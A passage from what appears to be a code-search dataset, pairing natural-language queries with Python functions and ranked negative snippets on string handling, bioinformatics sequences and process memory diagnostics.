in C:\n return NestedRE(p+p, '?')\n elif '*' in C:\n return NestedRE(p, '+')\n elif '+' in C:\n return NestedRE(p+p, '+')\n else:\n # Both without closure\n return NestedRE(p+p)\n # At least one has \"+\"\n elif '+' in C:\n return NestedRE(p, '+')\n elif '*' in C:\n return NestedRE(p, '*')\n # Only option left: both \"?\"\n else:\n return NestedRE(p+'?'+p+'?')", "def compose(self):\r\n return_str = \"\\t\".join([\r\n self.seqid,\r\n self.source,\r\n self.type,\r\n str(self.start),\r\n str(self.end),\r\n self.score,\r\n self.strand,\r\n self.phase,\r\n self.attributes.compose()\r\n ])\r\n return return_str", "def other_lines(line):\r\n res = \"\"\r\n for j, i in enumerate(line):\r\n res += i\r\n if j != len(line) - 1:\r\n res += '|'\r\n print(res)", "def get_separated_sequence():\n return [(\"ABCDEFG\", (\"ABEFG\", \"CD\")),\n (\"ABCDEFGCDCDDC\", (\"ABEFG\", \"CDCDCDDC\")),\n (\"\", (\"\", \"\")),\n ]", "def getMatch(reMatch,group=0):\n if reMatch: return reMatch.group(group)\n else: return ''", "def rest_of_ORF(dna):\n string = ''\n for i in xrange(0, len(dna), 3):\n codon = dna[i:i+3]\n if codon == 'TAG' or codon =='TAA' or codon =='TGA':\n return string\n else:\n string += codon\n return string", "def get_next_match_pick_first_available(population):\n p1 = None\n for player in population:\n if player.available:\n if p1 is not None:\n return p1, player\n else:\n p1 = player", "def getSequencefromPDB(pdbfile, chain='C', index=0):\n parser = PDB.PDBParser(QUIET=True)\n struct = parser.get_structure(pdbfile,pdbfile)\n ppb = PDB.PPBuilder()\n model = struct[0]\n peptides = ppb.build_peptides(model[chain])\n seq=''\n for i,pep in enumerate(peptides):\n seq+=str(pep.get_sequence())\n return seq", "def ndc_matcher_fragment (self) :\n sk = lambda ndc : (- len (ndc), ndc)\n ccs = sorted (self.ndc_info_map, key = sk)\n result = \"\".join ((\"(?P<ndc>\", \"|\".join (ccs), \")\"))\n return result", "def _get_extended_candidate(self, old_cand, new_char, new_char_index):\n new_text_state, new_word = old_cand.text_state.extended(new_char, new_char_index, sep=self.sep)\n if self.allowed_prefixes is not None and (new_word or new_text_state.last_word) not in self.allowed_prefixes:\n return None, None\n new_cand = self.text_to_candidate.get(new_text_state.text, None)\n if new_cand is None:\n new_cand = CtcBeamSearchCandidate(old_cand)\n self.text_to_candidate[new_text_state.text] = new_cand\n new_cand.text_state = new_text_state\n new_cand.new_logp_blank = -np.inf\n new_cand.new_logp_non_blank = -np.inf\n return new_cand, new_word", "def get_seq_from_pdbchain(chain):\n type_chain = check_type(chain)\n if type_chain == \"protein\":\n three_res_list = []\n for res in chain:\n residues_atoms = res.get_atoms()\n for atom in residues_atoms:\n if atom.get_name() == 'CA':\n residue = atom.get_parent()\n three_res_list.append(residue.get_resname())\n return three_to_one(three_res_list) # three_to_one function\n else:\n nucleic_acid_res = []\n for res in chain:\n residues_atoms = res.get_atoms()\n for atom in residues_atoms:\n if atom.get_name() == 'P':\n residue = atom.get_parent()\n nucleic_acid_res.append(residue.get_resname())\n nucleic_acid_seq = [x[2] for x in nucleic_acid_res]\n return \"\".join(nucleic_acid_seq)", "def triquad():\n return Formex(mpattern('12-34'))", "def get_summs_and_champs_from_match(self, match_id=None, match=None):\n if match_id is None: pass\n if match is None: match = self.get_match_by_id(match_id)\n\n s_ids = [p_id['player']['summonerId'] for p_id in match['participantIdentities']]\n 
c_ids = [p['championId'] for p in match['participants']]\n\n return s_ids, c_ids", "def dest(self) -> Optional[str]:\n if self._is_c():\n inst = self._cur()\n if \"=\" in inst:\n return inst.split(\"=\")[0]\n return None", "def make_potential(self):\n potential = ''\n for vpot in self.potentials:\n potential += vpot.get_content()\n return potential", "def solution(self) -> str:\n\n # \"Starting after the cup labeled 1, collect the other cups' labels clockwise into a single string with no\n # extra characters.\"\n\n self.current = 1\n eight_cups = self.pick_up_cups(8) # 9 cups in the circle, so all cups except '1' is 8 cups.\n\n answer = ''\n for cup in eight_cups:\n answer += str(cup)\n return answer", "def test_AppendMatch( self ):\n\t\tsource = BasicMethodSource()\n\t\tresult = self.parse( \"\"\"\n\t\t\tx := c*\n\t\t\tc := 'c'\n\t\t\"\"\", 'x', 'ccc', source)\n\t\tassert result == (1,[\n\t\t\t'c','c','c',\n\t\t],3), \"\"\"Result was %s\"\"\"%( result, )", "def asteriskify(matchobj):\n word = matchobj[0]\n return word[0] + '*' * (len(word)-2) + word[-1]", "def replace_char_candidate(self, char):\n for couple in self.char_couples:\n for i in range(2):\n if couple[i] == char:\n if i == 0:\n return couple[1]\n else:\n return couple[0]", "def output(self):\n\n return \"\".join(self.pieces)", "def get_complement(nucleotide):\n\t# TODO: implement this\n\tletter = str(nucleotide)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# set letter = parameter (make sure it's a string)\n\tif letter == 'A':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is A\n\t\treturn 'T'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return T\n\telif letter == 'T':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is T\n\t\treturn 'A'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return A\n\telif letter == 'G':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is G\n\t\treturn 'C'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return C\n\telif letter == 'C':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is C\n\t\treturn 'G'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return G\n\telse:\n\t\treturn None", "def extract(self): # type: () -> str\n if self.end():\n return self._src[self._marker :]\n else:\n return self._src[self._marker : self._idx]", "def getMatch(data):\n if len(data) > 15:\n return 'date: {0} {1}, match => {2}, {3}, {4}| 1x2 => {5}, {6}, {7}| handicap => {8}, {9}, {10}, {11}| OU => {12}, {13}, {14}, {15}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13], data[14], data[15], data[16])\n return 'date: {0} {1}, match => {2}, {3}, {4}| handicap => {5}, {6}, {7}, {8}| OU => {9}, {10}, {11}, {12}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13])", "def digest(sequence, enzyme, count_missed_cleavages=None, no_missed_cleavages=False):\n tmp = \"\"\n result = []\n additionals = list()\n # for backwards compatibility e.g. sole use of kwarg \"no_missed_cleavages\"\n # and no use of no_missed_cleavages\n if count_missed_cleavages is None: # i.e. 
not set\n if no_missed_cleavages is False:\n count_missed_cleavages = 2\n else:\n count_missed_cleavages = 0\n\n cleavage_aa, site = enzyme\n for p, aa in enumerate(sequence):\n if aa == \"*\":\n continue\n tmp += aa\n if aa in cleavage_aa:\n if site == \"C\":\n result.append(tmp)\n tmp = \"\"\n elif site == \"N\":\n\n result.append(tmp[0 : len(tmp) - 1])\n tmp = \"\"\n tmp += aa\n if tmp != \"\":\n result.append(tmp)\n if count_missed_cleavages > len(result):\n count_missed_cleavages = len(result)\n\n if count_missed_cleavages == 0:\n additionals = result\n else:\n for r in range(len(result)):\n # r is the index of each fully-cleaved peptide in the list from above\n for mc in range(r, len(result) + 1):\n # now starting with 'r' we interrogate all other pepitdes and build further peptides\n # up to the desired number of missed cleavages\n if mc - r >= count_missed_cleavages:\n continue\n if mc + 2 > len(result):\n # i.e. if are over end of list\n continue\n # need to add 2 to mc a it's a location marker.\n # mc is essentially the first peptide in the list\n newpep = \"\".join(result[r : mc + 2])\n if newpep != \"\":\n additionals.append(newpep)\n additionals += result\n return additionals", "def find_range_from_cons_pos(my_pos, gpcr_pdb):\n (ext_range,chain)=gpcr_pdb[my_pos]\n pos_range=str(ext_range)\n #pos_range=ext_range+\"-\"+ext_range\n return pos_range", "def represent_polypeptide(polypeptide, verbosity_level=0):\n output_string = \"\"\n separator = \"\"\n separator_backspace = 0\n if verbosity_level == IUPAC_1:\n separator = \"\"\n amino_acid_repr_strings = [amino_acid.IUPAC_1 for amino_acid in polypeptide]\n elif verbosity_level == IUPAC_3:\n separator = \"/\"\n amino_acid_repr_strings = [amino_acid.IUPAC_3 for amino_acid in polypeptide]\n elif verbosity_level == FULL_NAME:\n separator = \", \"\n amino_acid_repr_strings = [amino_acid.full_name for amino_acid in polypeptide]\n else:\n raise ValueError(\"Representation verbosity level must be one of: IUPAC_1, IUPAC_3, FULL_NAME.\")\n \n return separator.join(amino_acid_repr_strings)", "def get_partions(self) -> Union[ndarray, Tuple[ndarray, ndarray]]:\n if self.fragmented:\n return (self[self._begin:], self[:self._end])\n else:\n return self[self._begin:self._end]", "def combine(self):\n # If the contents of this command should be hidden from the main .cfg,\n # discard them.\n if self.hide_children:\n return \"\"\n\n # Set the evaluation state of this instance to COMBINE, as its code has\n # been generated.\n self.eval_state = COMMAND_EVAL_COMBINE\n\n # output will store the contents of this instance; meaning its code and\n # the code of its children.\n output = []\n\n # Loop through children and evaluate them.\n for ch in self.children:\n # Only evaluate children if they haven't been yet (i.e., their eval\n # state is not COMMAND_EVAL_COMBINE)\n if ch.eval_state == COMMAND_EVAL_REGISTER:\n gen = ch.generate()\n if gen is not None:\n output.append('alias \"'+str(ch)+'\" \"'+gen+'\"')\n output.extend(ch.combine())\n\n return output", "def merge(know, information):\n return know\n # result = []\n # for i in range(len(know)):\n # a = know[i]\n # b = information[i]\n # r = []\n # for j in range(2):\n # if a[j] != '?':\n # r.append(a[j])\n # elif b[j] != '?':\n # r.append(b[j])\n # else:\n # r.append('?')\n # result.append(''.join(r))\n # return result", "def reformat_peptide(regex_pattern, unimod_name, peptide):\n mods = []\n peptide = peptide.strip()\n if \"#\" in peptide:\n peptide, tmp_mods = peptide.split(\"#\")\n if tmp_mods != 
\"\":\n for mod in tmp_mods.split(\";\"):\n uni_mod, pos = mod.split(\":\")\n mods.append((int(pos), uni_mod, \"old\", 0))\n\n compiled_pattern = re.compile(regex_pattern)\n\n peptide = peptide.replace(\"_\", \"\") # strip the underscores\n\n matched_mod_position = []\n for match_number, match in enumerate(re.finditer(compiled_pattern, peptide)):\n original_match_start = match.start()\n original_match_end = match.end()\n match_length = original_match_end - original_match_start\n if unimod_name is None:\n mod_name = match.group(0)\n else:\n mod_name = unimod_name\n mods.append((original_match_start, mod_name, \"new\", match_length))\n\n mods.sort()\n new_mods = []\n total_match_length = 0\n have_seen_new_mods = False\n for pos, mod_name, mod_info, match_length in mods:\n\n if have_seen_new_mods:\n pos -= total_match_length\n\n new_mods.append(\"{0}:{1}\".format(mod_name, pos))\n if mod_info == \"new\":\n have_seen_new_mods = True\n total_match_length += match_length\n\n peptide = re.sub(regex_pattern, \"\", peptide)\n if len(new_mods) > 0:\n formated_peptide = \"{0}#{1}\".format(peptide, \";\".join(new_mods))\n else:\n formated_peptide = peptide\n # print( mods, '>>>> ', new_mods )\n return formated_peptide", "def PrintResult(self):\n if len(self.matchList) <= 0:\n return \"Unfortunately: \" + self.name + \" did not match any applicants\"\n mystring = self.name + \" matched: \"\n isFirst = True\n for eachApplicant in self.matchList:\n if isFirst:\n isFirst = False\n else:\n mystring += \"\\n\"\n mystring += eachApplicant.name\n return mystring", "def __str__(self):\n st=\"\"\n for g in self:\n st+=g.fasta()\n st+=\"\\n\"\n return st", "def reference_align_string(ref, cigar_int_pairs):\n out_ref = []\n ref_index = 0\n\n for b, cnt in cigar_int_pairs:\n sym = cigar_int_to_c(b) if isinstance(b, int) else b\n if sym in CIGAR_MATCH_MISSMATCH or sym in CIGAR_DELETION:\n assert ref_index + cnt <= len(ref)\n out_ref.extend(ref[ref_index:ref_index + cnt])\n ref_index += cnt\n\n elif sym in CIGAR_INSERTION:\n out_ref.extend(['-'] * cnt)\n return ''.join(out_ref)", "def get_protein_hgvs(annotation):\n if '%3D' in annotation['HGVSp']: # \"%3D\" is \"=\"\n try:\n amino_acids = ''.join([protein_letters_1to3[x] for x in annotation['Amino_acids']])\n return \"p.\" + amino_acids + annotation['Protein_position'] + amino_acids\n except Exception, e:\n print 'Could not create HGVS for: %s' % annotation\n return annotation['HGVSp'].split(':')[-1]", "def jointext(firststring, secondstring):\n\n # Return the joined strings\n return str(firststring) + str(secondstring)" ]
[ "0.58377457", "0.57520026", "0.55693895", "0.51852643", "0.5118976", "0.5036226", "0.4998545", "0.49705812", "0.49523178", "0.49279532", "0.4873407", "0.4863047", "0.48540068", "0.48335233", "0.4816873", "0.48077628", "0.48022303", "0.48017293", "0.4800456", "0.4780788", "0.47767282", "0.47730425", "0.47571063", "0.47556517", "0.47248587", "0.46824276", "0.46683428", "0.46679625", "0.46656692", "0.4647296", "0.46428585", "0.46417877", "0.46137848", "0.4607667", "0.46054512", "0.46050906", "0.45925945", "0.45905784", "0.45903057", "0.4586811", "0.45603716", "0.45599985", "0.4558451", "0.45561484", "0.45521867", "0.45491546", "0.45324418", "0.45303044", "0.45193523", "0.45187455", "0.45118773", "0.45059392", "0.45001367", "0.4497346", "0.4495109", "0.4489706", "0.44757673", "0.44747636", "0.446993", "0.4460349", "0.44576207", "0.44566318", "0.4453202", "0.44522968", "0.44481802", "0.44403064", "0.44379005", "0.4435142", "0.44273886", "0.44270292", "0.44190246", "0.44182578", "0.44151235", "0.4404203", "0.4389795", "0.43860295", "0.43819475", "0.43811476", "0.43761364", "0.4370565", "0.4366926", "0.43612295", "0.43567038", "0.4346655", "0.43463942", "0.4343423", "0.43386364", "0.43376303", "0.43373385", "0.43370116", "0.43342015", "0.433291", "0.43311095", "0.43286368", "0.43272114", "0.43242705", "0.4319835", "0.4317403", "0.43140116", "0.43094656" ]
0.6651385
0
Print memory diagnostics including the active resident set size
def print_memory_diags(disable_print=False):
    process = psutil.Process(os.getpid())
    memory = process.memory_info().rss/1000000000.0
    if not disable_print:
        logging.info('\tMemory usage: {:.3f} GB'.format(memory))
    return memory
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _mem_report(tensors: Iterable, mem_type: str) -> None:\n print(f\"Storage on {mem_type}\")\n print(\"-\" * LEN)\n total_numel = 0\n total_mem = 0\n visited_data: List[Any] = []\n for tensor in tensors:\n if tensor.is_sparse:\n continue\n # a data_ptr indicates a memory block allocated\n data_ptr = tensor.storage().data_ptr()\n if data_ptr in visited_data:\n continue\n visited_data.append(data_ptr)\n\n numel = tensor.storage().size()\n total_numel += numel\n element_size = tensor.storage().element_size()\n mem = numel * element_size / 1024 / 1024 # 32bit=4Byte, MByte\n total_mem += mem\n element_type = type(tensor).__name__\n size = tuple(tensor.size())\n\n if print_all:\n print(f\"{element_type}\\t\\t{size}\\t\\t{mem}\")\n print(\"-\" * LEN)\n print(f\"Total Tensors: {total_numel} \\tUsed Memory Space: {total_mem}\")\n print(\"-\" * LEN)", "def print_memory_stats(location_tag=\"undef\"):\n try:\n import psutil\n p = psutil.Process(os.getpid())\n rm, vm = p.get_memory_info()\n print \"MEM_STAT (%s) rm=%s, vm=%s\" % (location_tag, rm, vm)\n except ImportError:\n print \"psutil module not available\"", "def print_allocations(self, ):\n pass", "def show_mem(cmd, cnt, args):\n if cpu is None:\n log(\"Load program first\") \n return\n elif len(cpu.memory) == 0:\n log(\"Load program first\") \n return \n chunk = 0\n chunk_count = len(cpu.memory)\n while chunk < chunk_count: \n chunk_start = cpu.memory[chunk][MEMADDR]\n chunk_end = chunk_start + cpu.memory[chunk][MEMSIZE] \n log(\"{:d} {:#x}..{:#x}\".format(chunk, chunk_start, chunk_end)) \n chunk += 1\n if machine == \"ARM\":\n if len(cpu.high_memory) != 0:\n log(\"High memory\")\n for addr in sorted(cpu.high_memory):\n log(\"{:#x}\".format(addr))", "def display_memory(self) -> None:\n return self.__memory", "def get_memory_info():\n return psutil.virtual_memory()", "def show_mem_usage():\n gl = sys._getframe(1).f_globals\n vars = {}\n for k, v in list(gl.items()):\n # for pandas dataframes\n if hasattr(v, 'memory_usage'):\n mem = v.memory_usage(deep=True)\n if not np.isscalar(mem):\n mem = mem.sum()\n vars.setdefault(id(v), [mem]).append(k)\n # work around for a bug\n elif isinstance(v, pd.Panel):\n v = v.values\n vars.setdefault(id(v), [sys.getsizeof(v)]).append(k)\n total = 0\n for k, (value, *names) in vars.items():\n if value > 1e6:\n print(names, \"%.3fMB\" % (value / 1e6))\n total += value\n print(\"%.3fMB\" % (total / 1e6))", "def show_process_memory( cls, call_msg = \"\", log_level = None, print_it = False ):\n process = psutil.Process(os.getpid()) # import psutil\n mem = process.memory_info().rss\n # convert to mega and format\n mem_mega = mem/( 1e6 )\n msg = f\"{call_msg}process memory = {mem_mega:10,.2f} mega bytes \"\n if print_it:\n print( msg )\n if not ( log_level is None ):\n cls.__logger.log( log_level, msg )\n msg = f\"{mem_mega:10,.2f} mega bytes \"\n return ( mem, msg )", "def _dump_info(resolution, block_size, pwidth):\n V, H = resolution\n M, N = block_size\n bytes = int(ceil(pwidth / 8))\n mem_bytes = 2 * M * H * bytes\n print(\"Memory requirements:\")\n print(\" {:d} bytes for double buffer\".format(mem_bytes))\n\n return bytes, mem_bytes", "def report(self):\r\n print(\"\".join(self.memory), self.error, self.steps)", "def __repr__(self):\n return \"This {} has {} GB of memory\".format(\n self.name,\n self.memory_in_gb\n )", "def gather_info_and_display():\n # Obtain total rss displayed in memory.stat for each group,\n # container and service.\n try:\n output_mem = pipe_command(GREP_CMD, AWK_CMD, cwd=MEMPATH)\n 
LOG.debug(\n 'command: %s\\n%s',\n \"grep -rs total_rss '/sys/fs/cgroup/memory/' \"\n \"| awk '$2>0{print$0}' \",\n output_mem)\n except subprocess.CalledProcessError as error:\n LOG.error('Could not get total_rss memory, error=%s', error)\n return 1\n\n mem_info = get_meminfo()\n pt_groups = gather_groups_memory(output_mem)\n pt_cont = gather_containers_memory(output_mem)\n pt_serv = sys_service_memory()\n\n # Dump the tables out\n print('\\nPer groups memory usage:')\n\n # Get string to be printed and create list of elements separated by \\n\n list_of_table_lines = pt_groups.get_string().split('\\n')\n\n # Use the first line (+---+-- ...) as horizontal rule to insert later\n horizontal_line = list_of_table_lines[0]\n\n # Print the table, except last two lines ( \"Total\" row + final separator).\n print(\"\\n\".join(list_of_table_lines[:-2]))\n # Print separator, and finally the \"Total\" row.\n print(horizontal_line)\n print(\"\\n\".join(list_of_table_lines[-2:]))\n\n pt_namespc = prettytable.PrettyTable(\n ['Namespace',\n 'Resident Set Size (MiB)',\n ], caching=False)\n pt_namespc.align = 'l'\n pt_namespc.align['Resident Set Size (MiB)'] = 'r'\n\n print('\\nPer namespace memory usage:')\n for n_s in MEMORY['namespaces']:\n pt_namespc.add_row(\n [n_s,\n MEMORY['namespaces'][n_s],\n ])\n print(pt_namespc)\n\n print('\\nPer container memory usage:')\n print(pt_cont)\n\n print('\\nPer service memory usage:')\n print(pt_serv)\n\n base_mebib = 0.0\n k8s_system = 0.0\n k8s_addon = 0.0\n platform_memory_percent = 0.0\n\n # Calculate base memory usage (i.e., normal memory, exclude K8S and VMs)\n # e.g., docker, system.slice, user.slice\n for group in MEMORY['cgroups']:\n if group in BASE_GROUPS:\n base_mebib += float(MEMORY['cgroups'][group])\n\n # K8S platform system usage (essential) and addons usage (non-essential)\n for n_s in MEMORY['namespaces']:\n if n_s in K8S_NAMESPACE_SYSTEM:\n k8s_system += MEMORY['namespaces'][n_s]\n elif n_s in K8S_NAMESPACE_ADDON:\n k8s_addon += MEMORY['namespaces'][n_s]\n\n # Calculate platform memory usage\n platform_mebib = base_mebib + k8s_system\n\n anon_mebib = float(mem_to_mebibytes(\n mem_info['Active(anon)'] + mem_info['Inactive(anon)'])) * KBYTE\n avail_mebib = float(mem_to_mebibytes(\n mem_info['MemAvailable'])) * KBYTE\n total_mebib = float(anon_mebib + avail_mebib)\n\n anon_percent = py2_round(100 * anon_mebib / total_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n reserved_mebib = get_platform_reserved_memory()\n # Calculate platform memory in terms of percent reserved\n if reserved_mebib > 0.0:\n platform_memory_percent = py2_round(\n 100 * platform_mebib / reserved_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n pt_platf = prettytable.PrettyTable(\n ['Reserved',\n 'Platform',\n 'Base',\n 'K8s Platform system',\n 'k8s-addon'\n ], caching=False)\n pt_platf.align = 'l'\n\n pt_platf.add_row(\n [reserved_mebib,\n '{} ({}%)'.format(platform_mebib, platform_memory_percent),\n base_mebib,\n k8s_system,\n k8s_addon\n ])\n print('\\nPlatform memory usage in MiB:')\n print(pt_platf)\n\n pt_4k = prettytable.PrettyTable(\n ['Anon',\n 'Cgroup-rss',\n 'Available',\n 'Total'\n ], caching=False)\n pt_4k.align = 'l'\n\n pt_4k.add_row(\n ['{} ({}%)'.format(anon_mebib, anon_percent),\n MEMORY['cgroups']['total_rss'],\n avail_mebib,\n total_mebib\n ])\n\n print('\\n4K memory usage in MiB:')\n print(pt_4k)\n\n return 0", "def mem_info(self):\n\t\t\tavailable, total = cuda.mem_get_info() #Note: pycuda._driver.LogicError: cuMemGetInfo failed: context is 
destroyed\n\t\t\tprint(\"Available: %.2f GB\\nTotal: %.2f GB\"%(available/1e9, total/1e9))", "def mem_report(print_all: bool = False) -> None:\n\n def _mem_report(tensors: Iterable, mem_type: str) -> None:\n \"\"\"Print the selected tensors of type\n\n There are two major storage types in our major concern:\n - GPU: tensors transferred to CUDA devices\n - CPU: tensors remaining on the system memory (usually unimportant)\n\n Args:\n - tensors: the tensors of specified type\n - mem_type: 'CPU' or 'GPU' in current implementation \"\"\"\n print(f\"Storage on {mem_type}\")\n print(\"-\" * LEN)\n total_numel = 0\n total_mem = 0\n visited_data: List[Any] = []\n for tensor in tensors:\n if tensor.is_sparse:\n continue\n # a data_ptr indicates a memory block allocated\n data_ptr = tensor.storage().data_ptr()\n if data_ptr in visited_data:\n continue\n visited_data.append(data_ptr)\n\n numel = tensor.storage().size()\n total_numel += numel\n element_size = tensor.storage().element_size()\n mem = numel * element_size / 1024 / 1024 # 32bit=4Byte, MByte\n total_mem += mem\n element_type = type(tensor).__name__\n size = tuple(tensor.size())\n\n if print_all:\n print(f\"{element_type}\\t\\t{size}\\t\\t{mem}\")\n print(\"-\" * LEN)\n print(f\"Total Tensors: {total_numel} \\tUsed Memory Space: {total_mem}\")\n print(\"-\" * LEN)\n\n LEN = 65\n if print_all:\n print(\"=\" * LEN)\n print(\"Element type\\tSize\\t\\t\\tUsed MEM(MBytes)\")\n tensors = []\n for obj in gc.get_objects():\n try:\n if t.is_tensor(obj) or (hasattr(obj, \"data\") and t.is_tensor(obj.data)):\n tensors.append(obj)\n except Exception:\n pass\n cuda_tensors = [tensor for tensor in tensors if tensor.is_cuda]\n host_tensors = [tensor for tensor in tensors if not tensor.is_cuda]\n _mem_report(cuda_tensors, \"GPU\")\n _mem_report(host_tensors, \"CPU\")\n if print_all:\n print(\"=\" * LEN)", "def print_current_mem_usage():\n mem = get_current_mem_usage()\n output = \"# Mem usage = {} MiB #\".format(mem)\n print(\"\\n\" + \"-\" * len(output))\n print(output)\n print(\"-\" * len(output) + \"\\n\")", "def test00(self):\n\n # Obtain memory info (only for Linux 2.6.x)\n for line in Path(\"/proc/self/status\").read_text().splitlines():\n if line.startswith(\"VmSize:\"):\n vmsize = int(line.split()[1])\n elif line.startswith(\"VmRSS:\"):\n vmrss = int(line.split()[1])\n elif line.startswith(\"VmData:\"):\n vmdata = int(line.split()[1])\n elif line.startswith(\"VmStk:\"):\n vmstk = int(line.split()[1])\n elif line.startswith(\"VmExe:\"):\n vmexe = int(line.split()[1])\n elif line.startswith(\"VmLib:\"):\n vmlib = int(line.split()[1])\n print(\"\\nWallClock time:\", clock() - self.tref)\n print(\"Memory usage: ******* %s *******\" % self._getName())\n print(f\"VmSize: {vmsize:>7} kB\\tVmRSS: {vmrss:>7} kB\")\n print(f\"VmData: {vmdata:>7} kB\\tVmStk: {vmstk:>7} kB\")\n print(f\"VmExe: {vmexe:>7} kB\\tVmLib: {vmlib:>7} kB\")", "def memory():\n sin = psutil.virtual_memory()\n return round((sin.total / sin.used) / 100, 3)", "def logMemoryStats():\n class MemoryStatusEx(ctypes.Structure):\n \"\"\" MEMORYSTATUSEX \"\"\"\n kaFields = [\n ( 'dwLength', ctypes.c_ulong ),\n ( 'dwMemoryLoad', ctypes.c_ulong ),\n ( 'ullTotalPhys', ctypes.c_ulonglong ),\n ( 'ullAvailPhys', ctypes.c_ulonglong ),\n ( 'ullTotalPageFile', ctypes.c_ulonglong ),\n ( 'ullAvailPageFile', ctypes.c_ulonglong ),\n ( 'ullTotalVirtual', ctypes.c_ulonglong ),\n ( 'ullAvailVirtual', ctypes.c_ulonglong ),\n ( 'ullAvailExtendedVirtual', ctypes.c_ulonglong ),\n ];\n _fields_ = kaFields; # pylint: 
disable=invalid-name\n\n def __init__(self):\n super(MemoryStatusEx, self).__init__();\n self.dwLength = ctypes.sizeof(self);\n\n try:\n oStats = MemoryStatusEx();\n ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(oStats));\n except:\n reporter.logXcpt();\n return False;\n\n reporter.log('Memory statistics:');\n for sField, _ in MemoryStatusEx.kaFields:\n reporter.log(' %32s: %s' % (sField, getattr(oStats, sField)));\n return True;", "def debug(self):\n print(self.memory)\n print('r0 = %s, ip = %s' % (self.r0, self.ip))", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def print_unallocated(self, ):\n pass", "def memory(self):\n # Run 'free -m' command and make a list from output.\n mem_data = self.execCMD('free', '-m').split()\n total_mem = int(mem_data[7]) / 1024.\n used_mem = int(mem_data[15]) / 1024.\n # Caculate percentage\n used_mem_percent = int(used_mem / (total_mem / 100))\n\n # Results are in kilobyte.\n return total_mem, used_mem, used_mem_percent", "def ram(log=False):\n gc.collect()\n freeRam = gc.mem_free()\n allocatedRam = gc.mem_alloc()\n totalRam = freeRam+allocatedRam\n percentage = '{0:.2f} %'.format(freeRam/totalRam*100)\n if (log):\n print('■ Micropython RAM')\n print(' Total : {0:.2f} KB'.format(totalRam/1024))\n print(' Free : {0:.2f} KB'.format(freeRam/1024))\n print(' Free % : {0}'.format(percentage))\n print()\n return freeRam", "def print_memories(memories):\n print(\"Using layout:\", file=sys.stderr)\n for _, memory in memories.items():\n end = memory[\"base\"] + memory[\"length\"] - 1\n print(\"\\t%4s: 0x%08x-0x%08x (%s)\" %\n (memory[\"name\"], memory[\"base\"], end, memory[\"path\"]), file=sys.stderr)", "def info(dump_alloc_table: bytes, /) -> None:", "def print_output():\n print(\"count: [primary: \"+str(primary_shards)+\", replica: \"+str(secondary_shards)+\"]\")\n print(\"size: [primary: \"+pretty_print_storage(total_size_primary)+\", replica: \"+pretty_print_storage(total_size_secondary)+\"]\")\n print(\"disk-max-node: \"+max_size_node_name)\n print(\"watermark-breached: \"+str(watermark_breached))", "def _api_memory_info() -> Dict[str, Any]:\n process = psutil.Process(os.getpid())\n return {k: size(v) for k, v in process.memory_info()._asdict().items()}", "def get_memory() -> dict:\n import os\n\n import psutil\n\n proc = psutil.Process(os.getpid())\n return proc.memory_info()", "def print_mem_usage(usage):\n for region in usage.keys():\n used = usage[region][\"used\"]\n free = usage[region][\"free\"]\n usage_msg = \"{region}:\\n used: {used} bytes\\n free: {free} bytes\"\n usage_msg = usage_msg.format(region=region, used=used, free=free)\n print(usage_msg)", "def get_memory(isamAppliance, statistics_duration, check_mode=False, force=False):\n return isamAppliance.invoke_get(\n \"Retrieving the Memory Usage Statistics\",\n \"/statistics/systems/memory.json{0}\".format(\n tools.create_query_string(\n timespan=statistics_duration)),requires_model=requires_model)", "def get_mem_info():\n import psutil\n vm = psutil.virtual_memory()\n return {\n \"memtotal\": vm.total,\n \"memavailable\": vm.available,\n }", "def dumpMemory():\n libxml2mod.xmlDumpMemory()", "def printHeap(self):\n print 
self.storeHeap.movies", "def getMemDetail(self):\n mem = {}\n if self.type in ['E', 'T', 'S', 'K', 'A', 'AX', 'W']:\n m = \"The percentage of CP memory utilization:\\s*([\\d\\.]+)%\\s+DP memory utilization:\\s*([\\d\\.]+)%\"\n rt = re.search(m, self.dut.cli(\"show memory detail\"))\n if rt:\n mem = {\"cp\": float(rt.groups()[0]), \"dp\": float(rt.groups()[1])}\n return mem", "def get_memory_info(dut):\n command = \"top -n 1 b | grep 'KiB Mem' \"\n output = st.show(dut, command)\n include_keys = ['total', 'used', 'free', 'buff_cache']\n rv = {each_key: ast.literal_eval(output[0][each_key]) for each_key in output[0] if each_key in include_keys}\n return rv", "def print_numa_stats(numafiles):\n for numafile in numafiles:\n numafile.seek(0)\n node_id = int(numafile.name[numafile.name.find(\"/node/node\")+10:-9])\n ts = int(time.time())\n stats = dict(line.split() for line in numafile.read().splitlines())\n for stat, tag in (# hit: process wanted memory from this node and got it\n (\"numa_hit\", \"hit\"),\n # miss: process wanted another node and got it from\n # this one instead.\n (\"numa_miss\", \"miss\")):\n print (\"sys.numa.zoneallocs %d %s node=%d type=%s\"\n % (ts, stats[stat], node_id, tag))\n # Count this one as a separate metric because we can't sum up hit +\n # miss + foreign, this would result in double-counting of all misses.\n # See `zone_statistics' in the code of the kernel.\n # foreign: process wanted memory from this node but got it from\n # another node. So maybe this node is out of free pages.\n print (\"sys.numa.foreign_allocs %d %s node=%d\"\n % (ts, stats[\"numa_foreign\"], node_id))\n # When is memory allocated to a node that's local or remote to where\n # 